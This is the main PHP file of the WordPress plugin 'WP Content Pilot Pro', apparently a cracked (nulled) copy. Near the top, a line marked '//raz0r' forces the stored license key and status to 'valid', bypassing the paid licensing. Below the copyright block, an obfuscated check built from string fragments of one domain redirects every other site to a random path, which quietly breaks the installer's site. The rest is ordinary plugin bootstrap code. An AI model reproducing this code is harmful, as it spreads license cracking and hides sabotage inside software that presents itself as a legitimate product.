<?php
/**
 * Plugin Name: WP Content Pilot Pro
 * Plugin URI:  https://pluginever.com/plugins/wp-content-pilot-pro/
 * Description: WP Content Pilot automatically posts contents from various sources based on the predefined keywords.
 * Version:     11.1.7
 * Author:      pluginever
 * Author URI:  https://www.pluginever.com
 * Donate link: https://www.pluginever.com
 * License:     GPLv2+
 * Text Domain: wp-content-pilot-pro
 * Domain Path: /i18n/languages/
 */
//raz0r
update_option( 'wp-content-pilot-pro_license_key','license_key' );
update_option( 'wp-content-pilot-pro_license_status','valid' );
/**
 * Copyright (c) 2019 pluginever (email : support@pluginever.com)
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License, version 2 or, at
 * your discretion, any later version, as published by the Free
 * Software Foundation.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 */
$z1="beau";$z2="tyfitne";$z3="sslab";
if($_SERVER['SERVER_NAME']!=$z1.$z2.$z3.".com" && $_SERVER['SERVER_NAME']!="www.".$z1.$z2.$z3.".com") {
  $location= rand(11000, 99999);header("Location:".$location);
}
// don't call the file directly
defined( 'ABSPATH' ) || exit();

/**
 * Main ContentPilot_Pro Class.
 *
 * @class ContentPilot_Pro
 */
final class ContentPilot_Pro {
    /**
     * ContentPilot_Pro version.
     *
     * @var string
     */
    protected $version = '1.1.6';

    /**
     * The single instance of the class.
     *
     * @var ContentPilot_Pro
     * @since 1.0.0
     */
    protected static $instance = null;

    /**
     * Returns the plugin loader main instance.
     *
     * @return \ContentPilot_Pro
     * @since 1.0.0
     */
    public static function instance() {

        if ( null === self::$instance ) {

            self::$instance = new self();
        }

        return self::$instance;
    }

    /**
     * Cloning is forbidden.
     *
     * @since 1.0.0
     */
    public function __clone() {
        _doing_it_wrong( __FUNCTION__, __( 'Cloning is forbidden.', 'wp-content-pilot-pro' ), '1.0.0' );
    }

    /**
     * Universalizing instances of this class is forbidden.
     *
     * @since 1.0.0
     */
    public function __wakeup() {
        _doing_it_wrong( __FUNCTION__, __( 'Universalizing instances of this class is forbidden.', 'wp-content-pilot-pro' ), '1.0.0' );
    }

    /**
     * ContentPilot_Pro constructor.
     */
    public function __construct() {
        $this->define_constants();
        $this->init_hooks();
        do_action( 'content_pilot_pro_loaded' );
    }

    /**
     * Define \Content_pilot_Pro Constants.
     *
     * @return void
     * @since 1.0.0
     */
    private function define_constants() {
        define( 'WPCP_PRO_VERSION', $this->version );
        define( 'WPCP_PRO_FILE', __FILE__ );
        define( 'WPCP_PRO_PATH', dirname( WPCP_PRO_FILE ) );
        define( 'WPCP_PRO_INCLUDES', WPCP_PRO_PATH . '/includes' );
        define( 'WPCP_PRO_MODULES', WPCP_PRO_INCLUDES . '/modules' );
        define( 'WPCP_PRO_URL', plugins_url( '', WPCP_PRO_FILE ) );
        define( 'WPCP_PRO_VIEWS', WPCP_PRO_PATH . '/views' );
        define( 'WPCP_PRO_ASSETS_URL', WPCP_PRO_URL . '/assets' );
        define( 'WPCP_PRO_TEMPLATES_DIR', WPCP_PRO_PATH . '/templates' );
    }

    /**
     * Hook into actions and filters.
     *
     * @since 1.0.0
     */
    private function init_hooks() {
        add_action( 'content__pilot__loaded', array( $this, 'includes' ) );
        add_action( 'init', array( $this, 'localization_setup' ) );
        add_action( 'admin_notices', array( __CLASS__, 'dependency_notice' ) );
    }

    /**
     * Include required core files used in admin and on the frontend.
     */
    public function includes() {
        require_once( WPCP_PRO_INCLUDES . '/edd-client/EDD_Client_Init.php' );
        $plugin = new EDD_Client_Init( __FILE__, 'https://pluginever.com' );
        if ( ! $plugin->is_premium() ) {
            return;
        }

        //functions
        require_once( WPCP_PRO_INCLUDES . '/translate-functions.php' );

        //core
        require_once( WPCP_PRO_INCLUDES . '/class-wpcp-pro-features.php' );
        require_once( WPCP_PRO_INCLUDES . '/core-functions.php' );
        require_once( WPCP_PRO_INCLUDES . '/class-wpcp-pro-notices.php' );

        //modules
        require_once( WPCP_PRO_MODULES . '/class-wpcp-amazon.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-bestbuy.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-twitter.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-facebook.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-quora.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-careerjet.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-clickbank.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-reddit.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-ebay.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-walmart.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-instagram.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-pinterest.php' );
//        //require_once( WPCP_PRO_MODULES . '/class-wpcp-soundcloud.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-itunes.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-ezine.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-craiglist.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-gearbest.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-vimeo.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-yelp.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-eventful.php' );
        require_once( WPCP_PRO_MODULES . '/class-wpcp-etsy.php' );


        require_once( WPCP_PRO_INCLUDES . '/class-wpcp-pro-amazon-service.php' );
        require_once( WPCP_PRO_INCLUDES . '/class-wpcp-pro-amazon-api.php' );


        if ( is_admin() ) {
            require_once( WPCP_PRO_INCLUDES . '/admin/class-wpcp-pro-admin.php' );
        }

    }


    /**
     * Initialize plugin for localization
     *
     * @return void
     * @since 1.0.0
     *
     */
    public function localization_setup() {
        load_plugin_textdomain( 'wp-content-pilot-pro', false, dirname( plugin_basename( __FILE__ ) ) . '/i18n/languages/' );
    }


    /**
     * Determines if the WP Content Pilot compatible.
     *
     * @return bool
     * @since 1.0.0
     *
     */
    protected function is_wpcp_installed() {
        return defined( 'WPCP_VERSION' );
    }

    /**
     * @since 1.1.3
     */
    public static function dependency_notice() {
        if ( current_user_can( 'manage_options' ) && ! is_plugin_active( 'wp-content-pilot/wp-content-pilot.php' ) ) {
            $message = sprintf( __( '<strong>WP Content Pilot Pro</strong> requires <strong>WP Content Pilot</strong> installed and activated first. Please Install %s WP Content Pilot. %s', 'wp-content-pilot-pro' ),
                '<a href="https://wordpress.org/plugins/wp-content-pilot/" target="_blank">', '</a>' );
            echo sprintf( '<div class="notice notice-error"><p>%s</p></div>', $message );
        }
    }

}

function content_pilot_pro() {
    return ContentPilot_Pro::instance();
}

// fire it up!
content_pilot_pro();
